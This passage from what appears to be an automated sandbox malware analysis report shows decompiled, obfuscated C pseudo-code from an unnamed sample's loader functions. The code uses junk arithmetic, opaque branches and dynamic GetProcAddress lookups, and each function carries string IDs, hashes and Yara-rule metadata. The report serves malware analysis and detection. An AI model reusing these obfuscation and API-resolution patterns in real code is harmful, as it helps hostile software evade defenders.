					 *((intOrPtr*)(_t194 - 0x10)) =  *((intOrPtr*)(_t194 - 0x10)) + _t105;
				}
				_push( *0x5090ba);
				_t153 = 0x7632;
				_t173 = 0xa500;
				_t60 =  *(_t194 - 8);
				_t110 = "mscpxl32.dLL";
				_push( *0x5090d8);
				if("mscpxl32.dLL" != "mscpxl32.dLL") {
					 *0x509122 = 0x7632;
					_t153 = 0xffffffffff9b30b0;
					 *0x509184 =  *0x509184;
					 *0x5091b6 = 0xa500;
					_t173 = 0x5091ee;
				}
				 *(_t194 - 8) = _t60;
				_push(_t60);
				_push(0);
				_push(_t60);
				E004673BF(_t110);
				_push( *0x509062);
				 *((intOrPtr*)(_t194 - 0x1c)) = 0x37fedc;
				_t154 = _t153 + _t153;
				_push( *0x509150);
				_t116 = 0x4e2582;
				if( *(_t194 - 8) < 0x24a7d4) {
					_t116 =  *(_t194 - 0x14);
					_t205 = _t116 - _t116;
					if(_t116 < _t116) {
						_t116 = "CNBP_335.DLL";
					}
					_t154 =  *0x509152; // 0xe247
				}
				 *0x5091b4 = _t173;
				_t175 = 0x9f23;
				 *0x50bf12 =  *0x50bf12 + 0x9f23;
				 *(_t194 - 8) = E005002EA(_t116, _t154, 0x9f23, _t187, _t205);
				_t121 =  !( *((intOrPtr*)(_t194 - 0x10)) - 0x3bc6) +  !( *((intOrPtr*)(_t194 - 0x10)) - 0x3bc6);
				L00468D9F(_t121, 0x9f23, _t187, _t191, _t121, 1);
				_t155 =  *0x509128; // 0x5ccc
				if(_t155 != _t155) {
					 *((intOrPtr*)(_t194 - 0x28)) =  *((intOrPtr*)(_t194 - 0x28)) + _t155;
					 *0x50918c = _t155;
					 *0x5091f8 =  *0x5091f8 + 0x9280;
					_t175 = 0;
					_t191 = _t191 + 0xadd25c;
					 *0x509424 =  *0x509424 - _t187;
				}
				 *(_t194 - 0x14) = _t121;
				_t78 =  *(_t194 - 8);
				 *(_t194 - 0x58) = _t78;
				 *(_t194 - 8) = _t78;
				_t82 =  *(_t194 - 8);
				if(_t82 >= 0x2424ac) {
					if(_t155 <= _t155) {
						_t155 = 0x6f42;
					}
					 *0x50a5e0 =  *0x50a5e0 + _t175;
					 *0x5091b2 = _t175;
				}
				_t177 = 0x9e90;
				 *0x50bf13 = _t82;
				_t193 = _t191 + _t191 - 0xcddf;
				_push( *(_t194 - 0x58));
				_t125 = _t82 + 0x17dfe6;
				 *(_t194 - 0xc) = _t82;
				 *((intOrPtr*)(_t194 - 0x10)) = _t125;
				if(_t125 <= 0x3245) {
					 *0x509124 = _t155;
					_t163 =  *0x509170; // 0xfcb8
					_t155 = _t163 - 0x6cbb00;
					_t177 = 0;
					if(0 >= 0) {
						 *0x50923e =  *0x50923e + _t193;
					}
					 *0x50bf15 = 0xdb;
					_t187 = _t187 + _t187 + 0x402;
				}
				 *0x50bf09 =  *0x50bf09 - "wuapi.dll";
				if(0x2e068b <= 0x3c2b10) {
					_t155 = _t155 - 0x629f;
					_t177 = 0x50bf10;
				}
				_t179 =  !_t177;
				_t85 =  *(_t194 - 0xc);
				_push( *0x5093f8);
				_t188 = _t187 ^ 0x00dfbee2;
				 *(_t194 - 0xc) = _t85;
				_t130 = "api-ms-win-core-localization-l1-1-0.dll" - _t85 + 0x36;
				 *0x50bf0b =  *0x50bf0b + _t130;
				if(_t130 >= _t130) {
					_t179 = 0xffffffffffff6419;
					 *0x509230 = _t193;
					if(_t193 <= 0) {
						_t193 = _t193 - 0xbd5376;
						 *0x50ba8f =  *0x50ba8f - _t188;
					}
					if(_t188 >= 0) {
						E00509584 = _t85;
					}
					 *0x5090ae =  *0x5090ae + 0xf7 + _t85 + 0x26ae;
					_t155 = 0x5ddf;
				}
				 *0x509166 = _t155;
				 *0x5091e0 = _t179;
				 *(_t194 - 8) = GetProcAddress(??, ??);
				_t87 = E00466493(_t86, _t85, 0xffffffffff88e9d3, _t188, _t193, 0, _t86);
				_push(0);
				_push(1);
				_push(E0047A2EE);
				_push(E00466493);
				return _t87;
			}



























                      0x00479f01
                      0x00479f04
                      0x00479f0a
                      0x00479f11
                      0x00479f20
                      0x00479f2a
                      0x00479f2d
                      0x00479f30
                      0x00479f36
                      0x00479f3d
                      0x00479f46
                      0x00479f4d
                      0x00479f4d
                      0x00479f5a
                      0x00479f5c
                      0x00479f63
                      0x00479f69
                      0x00479f6f
                      0x00479f74
                      0x00479f80
                      0x00479f8c
                      0x00479f8c
                      0x00479f9f
                      0x00479fa9
                      0x00479fbe
                      0x00479fd0
                      0x00479fd3
                      0x00479fd8
                      0x00479fe1
                      0x00479fe3
                      0x00479fed
                      0x00479ff3
                      0x00479ffa
                      0x0047a004
                      0x0047a004
                      0x0047a00a
                      0x0047a00d
                      0x0047a00e
                      0x0047a010
                      0x0047a011
                      0x0047a021
                      0x0047a054
                      0x0047a05a
                      0x0047a05c
                      0x0047a063
                      0x0047a078
                      0x0047a07a
                      0x0047a07d
                      0x0047a07f
                      0x0047a081
                      0x0047a081
                      0x0047a089
                      0x0047a089
                      0x0047a090
                      0x0047a09a
                      0x0047a09e
                      0x0047a0a9
                      0x0047a0cd
                      0x0047a0d3
                      0x0047a0d8
                      0x0047a0e1
                      0x0047a0e3
                      0x0047a0e6
                      0x0047a0f4
                      0x0047a0fb
                      0x0047a0ff
                      0x0047a111
                      0x0047a11d
                      0x0047a121
                      0x0047a124
                      0x0047a127
                      0x0047a12a
                      0x0047a13f
                      0x0047a147
                      0x0047a159
                      0x0047a15b
                      0x0047a15b
                      0x0047a15f
                      0x0047a165
                      0x0047a165
                      0x0047a173
                      0x0047a177
                      0x0047a17f
                      0x0047a184
                      0x0047a18f
                      0x0047a195
                      0x0047a198
                      0x0047a1a0
                      0x0047a1aa
                      0x0047a1b4
                      0x0047a1bb
                      0x0047a1c5
                      0x0047a1ce
                      0x0047a1d0
                      0x0047a1d9
                      0x0047a1e1
                      0x0047a1e8
                      0x0047a1e8
                      0x0047a1f2
                      0x0047a206
                      0x0047a20c
                      0x0047a214
                      0x0047a214
                      0x0047a21c
                      0x0047a21e
                      0x0047a221
                      0x0047a227
                      0x0047a238
                      0x0047a23d
                      0x0047a240
                      0x0047a248
                      0x0047a25c
                      0x0047a261
                      0x0047a26d
                      0x0047a26f
                      0x0047a275
                      0x0047a27b
                      0x0047a282
                      0x0047a284
                      0x0047a284
                      0x0047a292
                      0x0047a2a2
                      0x0047a2a2
                      0x0047a2a6
                      0x0047a2b5
                      0x0047a2d4
                      0x0047a2da
                      0x0047a2df
                      0x0047a2e1
                      0x0047a2e3
                      0x0047a2e8
                      0x0047a2ed

                      APIs
                      • GetProcAddress.KERNEL32(?,?), ref: 0047A2C9
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: CNBP_335.DLL$G`}$NtSetDriverEntryOrder$RtlReleaseRelativeName$WFServicesReg.exe$_["$api-ms-win-core-localization-l1-1-0.dll$api-ms-win-core-string-l1-1-0.dll$dpnet.dll$mscpxl32.dLL$wuapi.dll
                      • API String ID: 190572456-2247967915
                      • Opcode ID: 2fdac908724619ba68c6a58d5e0acf97712474f1951521e1885ac127e11245d5
                      • Instruction ID: 96312902e119c199033ed8eb33a92dee8e8fb1406ecd6d3ad292b8b30d43a415
                      • Opcode Fuzzy Hash: 2fdac908724619ba68c6a58d5e0acf97712474f1951521e1885ac127e11245d5
                      • Instruction Fuzzy Hash: FEA1DF75A103069FCB00EFB8ECD86CD7BB1EB79320F04846AD844A7366E3750949DB15
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0048CCCA Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 192libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0048CDC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G.V$G`}$IMCCPHR.exe$MapUserPhysicalPages$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$OSProvider.dll$RtlReleaseRelativeName$dpnet.dll$mscpxl32.dLL$rj6$wuapi.dll
                      • API String ID: 190572456-628137075
                      • Opcode ID: d18df73e262b0314aa58deaef17ae0c678bc675c1c40e8852fba680e858030c1
                      • Instruction ID: deaa35dda211ed40c6b9431fda4f0cba5cddf8dc0a99e36b9bcda8c836615389
                      • Opcode Fuzzy Hash: d18df73e262b0314aa58deaef17ae0c678bc675c1c40e8852fba680e858030c1
                      • Instruction Fuzzy Hash: BF719EB9A103079BCB00AFB8E8D46DDBBB1FB39320F04446AD950A7756E3390949DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0046EE56 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 288libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: ?$G.V$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtPowerInformation$NtSetDriverEntryOrder$OSProvider.dll$System.Xml.XmlDocument.dll$TpCaptureCaller$pYqt$wuapi.dll
                      • API String ID: 190572456-2048219164
                      • Opcode ID: 733806bad10af6a1aeb342153b127d18cc0594b02d8a1a014a9ffd44352c2204
                      • Instruction ID: 7767561ba40ad6dc2689977eb57d864523337df953ee4238dd8bc54128de38dc
                      • Opcode Fuzzy Hash: 733806bad10af6a1aeb342153b127d18cc0594b02d8a1a014a9ffd44352c2204
                      • Instruction Fuzzy Hash: 70B17879E1020A9BCB00EFB9E8D45DDBBF0FB29324F04806AD945E7356E3744A89DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004904C6 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 253libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 22%
                      			E004904C6() {
				signed int _t53;
				signed int _t55;
				signed int _t58;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t65;
				_Unknown_base(*)()* _t66;
				signed int _t68;
				signed int _t105;
				void* _t127;
				void* _t135;
				short _t137;
				short _t138;
				signed char _t155;
				intOrPtr _t161;
				void* _t162;
				void* _t167;
				void* _t168;
				void* _t170;
				void* _t175;
				char* _t179;

				_push( *0x50911a);
				 *((intOrPtr*)(_t175 - 0x24)) =  *((intOrPtr*)(_t175 - 0x24)) - _t135;
				_t137 = _t135 + _t135 + 0x79;
				_t53 =  *(_t175 - 8);
				_push( *0x5090ca);
				_t80 = 0xbadb62;
				if(0xbadb62 == 0xbadb62) {
					 *0x50913e = _t137;
				}
				_t138 = 0x8184;
				 *(_t175 - 8) = _t53;
				_t55 =  *(_t175 - 8);
				 *((intOrPtr*)(_t175 - 0x10)) =  *((intOrPtr*)(_t175 - 0x10)) + _t55;
				 *(_t175 - 8) = _t55;
				L00469469(_t80, _t162, _t170, _t55);
				_t58 =  *(_t175 - 8);
				_push( *0x50914c);
				 *(_t175 - 8) = _t58;
				if(_t58 != 0x17) {
					L5:
					 *0x509166 = _t138;
					goto L6;
				} else {
					_t80 = "IMCCPHR.exe";
					if(_t80 != _t80) {
						L6:
						_t155 =  *0x5091b0; // 0x1
						 *0x509200 = _t155;
						_t60 = E005002EA(_t80, _t138, _t155, _t162, _t179);
						if(_t60 >= 0) {
							 *0x50bf17 = _t60;
							_t162 = _t162 + 0x8a3f9;
							 *0x50bf09 =  *0x50bf09 + _t60;
							if(_t60 >= 0x292c) {
								 *(_t175 - 0x1c) =  &(( *(_t175 - 0x1c))[(char*)("WSManHTTPConfig.exe")]);
								 *0x509182 = 0x7021;
							}
							_t155 = 0;
						}
						if((_t155 & 0x0080da5f) == 0) {
							 *0x509206 =  *0x509206 + _t155;
						}
						 *0x509222 = _t155;
						 *0x509348 =  *0x509348 - _t170;
						 *0x50bf14 =  *0x50bf14 - _t60;
						 *0x5094e4 = _t60;
						 *(_t175 - 0x58) = _t60;
						 *(_t175 - 8) = _t60;
						 *(_t175 - 0xc) = _t60;
						_t61 =  *(_t175 - 8);
						if(0x3c0387 < 0x3c0387) {
							L15:
							_t139 = 0x637f;
							if(0x637f != 0x637f) {
								goto L18;
							}
							_t139 = 0x62fa;
							_t155 = 0x92cd >> 0x62fa;
							goto L17;
						} else {
							_t161 =  *0x5091d8; // 0x989a
							_t155 = _t161 - 0x90dea1;
							 *0x509228 =  *0x509228 + _t155;
							_t170 = _t170 + _t170 - 0xad27aa;
							 *0x50bf15 = _t61;
							 *0x50900e =  *0x50900e - _t61;
							 *0x50bf07 =  *0x50bf07 - _t61;
							_t127 = 0 - _t61 + 0x2d;
							 *0x50bf0a =  *0x50bf0a - _t127;
							if(_t127 != 0x35e124) {
								L17:
								L18:
								 *0x50b616 =  *0x50b616 + _t170;
								_push( *(_t175 - 0x58));
								_t167 = (0 >> _t139) + (0 >> _t139);
								 *(_t175 - 8) = _t61;
								if(_t61 < 0x17) {
									L24:
									 *0x50bf0e =  *0x50bf0e + _t139;
									L25:
									 *0x50a6dc =  *0x50a6dc + _t155;
									_t63 =  *(_t175 - 8);
									_push( *0x50944c);
									_t168 = _t167 + _t167;
									 *0x5094d0 = _t63;
									 *(_t175 - 0xc) = _t63;
									 *(_t175 - 0x14) =  *(_t175 - 0xc);
									_t65 =  *(_t175 - 0xc);
									if(0x7e48 != 0x7e48) {
										L33:
										 *(_t175 - 0x1c) = "networkitemfactory.dll";
										_t146 = 0;
										_t66 = GetProcAddress(??, ??);
										 *0x5091f4 =  *0x5091f4 - _t155;
										 *(_t175 - 8) = _t66;
										_t68 =  *(_t175 - 8);
										if(0 < 0x3c8c) {
											L36:
											 *0x5091aa = 0;
											 *0x50bf12 =  *0x50bf12 + _t68;
											L37:
											if((_t68 & 0x000000be) >= 0) {
												 *0x50bf15 = _t68;
											}
											_t105 =  *0x50bf17; // -1
											 *(_t175 - 8) = _t68;
											 *0x509e54 = _t68;
											 *0x50bf13 = _t68;
											 *(_t175 - 8) = _t68;
											 *(_t175 - 0xc) =  !_t68;
											 *((intOrPtr*)(_t175 - 0x18)) = _t105 - 0xe09;
											_push(0);
											_push(0x490854);
											goto __ecx;
										}
										_t146 = 0;
										if(0 >= 0) {
											goto L37;
										}
										_t146 =  *0x50915e; // 0xd6d8
										goto L36;
									}
									if(0x7008 != 0x7008) {
										L29:
										 *0x50964e =  *0x50964e + _t168;
										if(_t65 >= 3) {
											L32:
											goto L33;
										}
										L31:
										goto L32;
									}
									 *0x50bf10 =  *0x50bf10 - _t155;
									if((_t155 & 0x0000009a) >= 0) {
										goto L31;
									}
									_t170 = _t170 + 1;
									goto L29;
								}
								 *((intOrPtr*)(_t175 - 0x18)) =  *((intOrPtr*)(_t175 - 0x18)) + 0x30aea0;
								_t139 = _t139 - 0x5f;
								 *0x50917c = _t139;
								if((_t139 & 0x00000087) != 0) {
									_t155 = _t155 + 0x97;
									 *0x50aa1c =  *0x50aa1c - _t155;
									 *0x509214 = _t155;
									_t170 = _t170 - 0xa8e506;
								}
								 *0x509340 =  *0x509340 - _t170;
								_t170 = _t170 + _t167;
								if(_t167 >= 0 || _t167 <= 0) {
									goto L24;
								} else {
									goto L25;
								}
							}
							goto L15;
						}
					}
					_t179 = _t80;
					_t138 = 0x5e46;
					goto L5;
				}
			}

























                      0x004904d0
                      0x004904e1
                      0x004904e7
                      0x004904f2
                      0x004904f5
                      0x004904fc
                      0x00490501
                      0x00490503
                      0x00490503
                      0x00490510
                      0x00490514
                      0x0049051c
                      0x0049051f
                      0x00490522
                      0x00490526
                      0x0049052d
                      0x00490530
                      0x00490537
                      0x0049053c
                      0x00490553
                      0x00490553
                      0x00000000
                      0x00490540
                      0x00490544
                      0x0049054b
                      0x0049055d
                      0x0049055d
                      0x00490564
                      0x0049056e
                      0x00490575
                      0x0049057b
                      0x00490582
                      0x0049058d
                      0x00490597
                      0x004905a4
                      0x004905b0
                      0x004905b0
                      0x004905b7
                      0x004905b7
                      0x004905c0
                      0x004905c2
                      0x004905c2
                      0x004905c9
                      0x004905d6
                      0x004905dd
                      0x004905eb
                      0x004905f0
                      0x004905fb
                      0x004905fe
                      0x0049060c
                      0x00490611
                      0x00490674
                      0x00490677
                      0x0049067d
                      0x00000000
                      0x00000000
                      0x00490681
                      0x00490688
                      0x00000000
                      0x00490613
                      0x00490620
                      0x00490627
                      0x0049062d
                      0x00490637
                      0x0049063f
                      0x0049064e
                      0x00490655
                      0x00490660
                      0x00490663
                      0x0049066f
                      0x00000000
                      0x0049068e
                      0x00490692
                      0x00490698
                      0x0049069e
                      0x004906a2
                      0x004906a7
                      0x004906fe
                      0x00490710
                      0x0049071b
                      0x0049071f
                      0x00490725
                      0x00490728
                      0x0049072e
                      0x00490734
                      0x0049073f
                      0x00490747
                      0x0049074d
                      0x00490758
                      0x00490799
                      0x0049079e
                      0x004907a9
                      0x004907ac
                      0x004907b2
                      0x004907bb
                      0x004907c3
                      0x004907cf
                      0x004907e3
                      0x004907e3
                      0x004907f3
                      0x004907f9
                      0x004907fc
                      0x00490808
                      0x00490808
                      0x0049080d
                      0x0049081d
                      0x00490820
                      0x00490825
                      0x00490832
                      0x00490837
                      0x00490840
                      0x00490845
                      0x00490848
                      0x00490852
                      0x00490852
                      0x004907d6
                      0x004907da
                      0x00000000
                      0x00000000
                      0x004907dc
                      0x00000000
                      0x004907dc
                      0x00490763
                      0x00490777
                      0x00490782
                      0x0049078d
                      0x00490794
                      0x00000000
                      0x00490794
                      0x00000000
                      0x00000000
                      0x00490790
                      0x00490769
                      0x00490772
                      0x00000000
                      0x00000000
                      0x00490776
                      0x00000000
                      0x00490776
                      0x004906b1
                      0x004906b9
                      0x004906bc
                      0x004906c6
                      0x004906c8
                      0x004906cb
                      0x004906d1
                      0x004906de
                      0x004906de
                      0x004906e4
                      0x004906eb
                      0x004906f1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004906f1
                      0x00000000
                      0x00490671
                      0x00490611
                      0x0049054d
                      0x0049054f
                      0x00000000
                      0x0049054f

                      APIs
                      • GetProcAddress.KERNEL32(?,?), ref: 004907AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: $5$00($G.V$IMCCPHR.exe$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$TpCaptureCaller$WSManHTTPConfig.exe$WinFax.dll$networkitemfactory.dll$sxproxy.dll
                      • API String ID: 190572456-4220570940
                      • Opcode ID: 0133344459c2b9a94e9110bb4c107467a688ad425ab490d00e2f07bd2ee4eb87
                      • Instruction ID: 213c8c1cccce8e841b276fdec85fb82eb7e9d03776fc9dd1c8ebec4899023c86
                      • Opcode Fuzzy Hash: 0133344459c2b9a94e9110bb4c107467a688ad425ab490d00e2f07bd2ee4eb87
                      • Instruction Fuzzy Hash: 9E91BCB5E102469FDB00DFB9E8982CD7FB1EB79320F08456AC948D736AE3380949DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0049D876 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 207libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 32%
                      			E0049D876(signed char __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi) {
				signed char _t43;
				signed char _t49;
				unsigned short _t54;
				signed char _t56;
				signed char _t68;
				char* _t72;
				void* _t81;
				char* _t82;
				signed int _t83;
				short _t117;
				intOrPtr _t118;
				signed char _t119;
				signed short _t136;
				signed int _t138;
				void* _t142;
				void* _t144;
				void* _t145;
				void* _t147;
				void* _t152;
				void* _t157;

				_t144 = __edi;
				_t134 = __edx;
				_t43 = __eax;
				if(__ebx != __ecx) {
					L2:
					L3:
					_t152 = 0xffffffffffff303a;
					 *(_t157 - 0x58) = _t43;
					 *(_t157 - 8) = _t43;
					_t81 = _t43 + _t43;
					E00469BBC(_t81, _t144, 0xffffffffffff303a, 0, 1, _t81);
					_t82 = _t81 + 0x4d;
					if(_t82 >= 0x36) {
						 *0x5090c4 =  *0x5090c4 + _t82;
						 *(_t157 - 0x1c) = _t82;
					}
					_t49 =  *(_t157 - 8);
					_t117 = 0x175b75a;
					_t136 = _t134 + _t134 + 1;
					if((_t136 & 0x00009bb7) < 0) {
						L10:
						_t118 =  *0x50917c; // 0xcbc1
						_t119 = _t118 - 0x7f;
						_push( *(_t157 - 0x58));
						_t145 = _t144 + 0xdb510b;
						 *(_t157 - 8) = _t49;
						_t83 =  !_t82;
						_t54 = 0x1e43cd >> _t119;
						if(_t83 >= 0x32) {
							L13:
							_t145 = 0xf6a0;
							_t54 = 3;
							L14:
							 *0x50bf09 =  *0x50bf09 - _t54;
							if(_t54 == 0x2aac) {
								 *0x50bf0b =  *0x50bf0b + _t83;
							}
							 *0x509156 =  *0x509156 + _t119 - 0x61dd;
							_t138 =  !(_t136 - 1);
							_t56 =  *(_t157 - 8);
							_push( *0x5094c4);
							_t147 = _t145 + _t145;
							 *(_t157 - 8) = _t56;
							if(_t56 <= 0x25) {
								L19:
								 *0x509012 =  *0x509012 + _t147;
								goto L20;
							} else {
								 *((intOrPtr*)(_t157 - 0x28)) =  *((intOrPtr*)(_t157 - 0x28)) - 0x63f4;
								 *0x509190 = 0x63f4;
								_t142 = _t138 - 0x9342;
								 *0x5091fa =  *0x5091fa - _t142;
								 *0x50bf12 =  *0x50bf12 + _t142;
								_t152 = _t152 + _t152;
								if((_t56 & 0x000000be) != 0) {
									L20:
									 *0x509146 = 0x538319;
									 *(_t157 - 8) = GetProcAddress(??, ??);
									_t68 =  *(_t157 - 8);
									if(_t68 <= 0x2be529) {
										L23:
										if((_t68 & 0x000000b2) >= 0) {
										}
										L25:
										 *0x50a310 = _t68;
										 *(_t157 - 8) = _t68;
										 *(_t157 - 0x1c) =  *(_t157 - 0x1c) - 0x2e78d1;
										_push(0);
										_t72 = "dpnet.dll";
										 *(_t157 - 0x10) = _t72;
										_push(0);
										_push(0);
										_push(0x49db7e);
										_push(E00466493);
										return _t72;
									}
									if(0x13c0 != 0) {
										goto L25;
									}
									 *0x5091b4 = 0x50ab20;
									goto L23;
								}
								 *0x50bf14 = _t56;
								goto L19;
							}
						}
						_t83 = 0x48b15a;
						_t119 =  *0x509154; // 0x60e4
						 *((intOrPtr*)(_t157 - 0x2c)) =  *((intOrPtr*)(_t157 - 0x2c)) - _t119;
						_t136 = _t136 + _t136;
						if((_t136 & 0x00009020) < 0) {
							goto L14;
						}
						_t136 = 0x9fe5;
						 *0x50bf13 = _t54;
						 *0x509618 =  *0x509618 - _t145;
						goto L13;
					} else {
						_t144 = _t144 + 0xea8f;
						 *0x50bf07 =  *0x50bf07 + _t49;
						if(_t49 > 0xf) {
							L8:
							_t82 = 0xfe;
							_t117 = _t117 - 0x5daf;
							L9:
							 *0x509148 = _t117;
							goto L10;
						}
						_t82 = "MapUserPhysicalPages";
						if(_t82 > 0x37bd38) {
							goto L9;
						}
						goto L8;
					}
				}
				 *0x5091a0 = __ecx + 0x73;
				_t134 = (__edx & 0x0081c694) - 0x88d8d7;
				if((_t134 & 0x008feb19) < 0) {
					goto L3;
				}
				goto L2;
			}























                      0x0049d876
                      0x0049d876
                      0x0049d876
                      0x0049d879
                      0x0049d89c
                      0x0049d89f
                      0x0049d8a1
                      0x0049d8aa
                      0x0049d8ad
                      0x0049d8b9
                      0x0049d8c1
                      0x0049d8c6
                      0x0049d8e6
                      0x0049d8e8
                      0x0049d8ef
                      0x0049d8ef
                      0x0049d8f8
                      0x0049d8fd
                      0x0049d901
                      0x0049d907
                      0x0049d946
                      0x0049d946
                      0x0049d94d
                      0x0049d950
                      0x0049d953
                      0x0049d959
                      0x0049d966
                      0x0049d970
                      0x0049d976
                      0x0049d9b6
                      0x0049d9b8
                      0x0049d9bd
                      0x0049d9bf
                      0x0049d9bf
                      0x0049d9cb
                      0x0049d9cd
                      0x0049d9cd
                      0x0049d9dc
                      0x0049d9ee
                      0x0049d9f0
                      0x0049d9f3
                      0x0049d9f9
                      0x0049da00
                      0x0049da05
                      0x0049da51
                      0x0049da51
                      0x00000000
                      0x0049da07
                      0x0049da1c
                      0x0049da1f
                      0x0049da29
                      0x0049da2e
                      0x0049da35
                      0x0049da3b
                      0x0049da40
                      0x0049da58
                      0x0049da74
                      0x0049daaf
                      0x0049dad4
                      0x0049dadc
                      0x0049db08
                      0x0049db14
                      0x0049db14
                      0x0049db25
                      0x0049db2d
                      0x0049db3e
                      0x0049db55
                      0x0049db58
                      0x0049db67
                      0x0049db6c
                      0x0049db6f
                      0x0049db71
                      0x0049db73
                      0x0049db78
                      0x0049db7d
                      0x0049db7d
                      0x0049daff
                      0x00000000
                      0x00000000
                      0x0049db01
                      0x00000000
                      0x0049db01
                      0x0049da42
                      0x00000000
                      0x0049da4f
                      0x0049da05
                      0x0049d97d
                      0x0049d988
                      0x0049d98f
                      0x0049d992
                      0x0049d999
                      0x00000000
                      0x00000000
                      0x0049d99b
                      0x0049d99f
                      0x0049d9af
                      0x00000000
                      0x0049d90c
                      0x0049d918
                      0x0049d91f
                      0x0049d927
                      0x0049d939
                      0x0049d939
                      0x0049d93a
                      0x0049d93f
                      0x0049d93f
                      0x00000000
                      0x0049d93f
                      0x0049d92c
                      0x0049d937
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0049d937
                      0x0049d907
                      0x0049d881
                      0x0049d88e
                      0x0049d89a
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0049DAA1
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: )+$2$6$G`}$IMCCPHR.exe$MapUserPhysicalPages$NtSetDriverEntryOrder$TpCaptureCaller$WFServicesReg.exe$dpnet.dll
                      • API String ID: 190572456-187336105
                      • Opcode ID: 15c5c40213fc57d6164c3f563253a62f2f1813f1fa9ce12e8336d90126c4fa8e
                      • Instruction ID: a1a4a5c3c12e41a8afffbceb26450b1d4127d30ab9a3af00ef676db94d85b21f
                      • Opcode Fuzzy Hash: 15c5c40213fc57d6164c3f563253a62f2f1813f1fa9ce12e8336d90126c4fa8e
                      • Instruction Fuzzy Hash: BD710376E142068FEB00AF79DC993DE3FB1EB79310F08447A8955A73A6E3380949DB45
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004F4A5A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 166memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 32%
                      			E004F4A5A() {
				signed int _t42;
				signed int _t45;
				signed int _t49;
				signed int _t57;
				signed int _t58;
				int _t60;
				char* _t61;
				signed int _t66;
				signed int _t69;
				signed int _t77;
				signed int _t82;
				int _t88;
				void* _t89;
				void* _t102;
				short _t104;
				void* _t116;
				void* _t117;
				signed int _t119;
				signed int _t120;
				void* _t122;

				asm("adc eax, 0x5091ac");
				_t111 = 0x9c3d;
				_t42 =  *(_t122 - 8);
				_t77 = _t42;
				 *(_t122 - 0xc) = _t42;
				_t45 =  *(_t122 - 0x50);
				 *0x50bf13 = _t45;
				_t120 = _t119;
				 *(_t122 - 8) = _t45;
				if(_t45 >= 0x16b9ca) {
					_t77 = 0x3a1515;
					 *(_t122 - 0x14) = 0x3a1515;
					 *0x509182 = 0x682e;
					_t102 = 0x1046b;
					_t111 =  *0x5091b6; // 0xc472
					if((_t111 & 0x00008f9b) > 0) {
						 *0x509206 = _t111;
					}
					 *0x509222 = _t111;
					_t45 = 0xc2;
					 *0x50b744 =  *0x50b744 - _t120;
				}
				 *0x50bf14 = _t45;
				_t117 = _t116 + 0xd5a6c6;
				 *0x509664 =  *0x509664 - _t117;
				_t49 =  *(_t122 - 8);
				 *(_t122 - 0xac) = _t49;
				 *(_t122 - 8) = _t49;
				 *0x50908e =  *0x50908e;
				_t53 =  *(_t122 - 8);
				_t82 = (_t77 ^ 0x00004bc7) - 0x1446e8 + 0x3dd491;
				E004ECD9A( *(_t122 - 8), _t82, _t102, _t120,  *(_t122 - 8), _t53);
				_t57 =  *(_t122 - 8);
				 *(_t122 - 0x14) = _t82;
				_push( *(_t122 - 0xac));
				_t104 = _t102 - 0x53fb37 + 0x6a21dd;
				 *(_t122 - 8) = _t57;
				if(_t57 <= 0x18c4) {
